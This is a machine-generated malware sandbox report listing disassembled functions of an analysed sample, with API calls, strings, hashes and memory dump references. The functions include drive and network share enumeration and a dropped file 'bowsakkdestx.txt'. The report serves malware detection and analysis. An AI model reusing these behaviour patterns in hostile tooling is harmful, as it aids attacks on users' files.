                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                                                                                        • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                                                                                                        • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                                                                                        • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                                                                                                        • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                                                                                        • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                                                        • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                                                                                        • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                                                                                                        • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00441734
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 004417D0
                                                                                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                                                                                                        • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                                                                                        • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                                                                                                        • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043B71E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                                                                                        • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                                                                                                        • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                                                        • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                                                        • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                                                                                                        • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                                                                                                        • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                                                                                                                        • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                                                                                                        • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                                                                                                                        • API String ID: 2102423945-2013712220
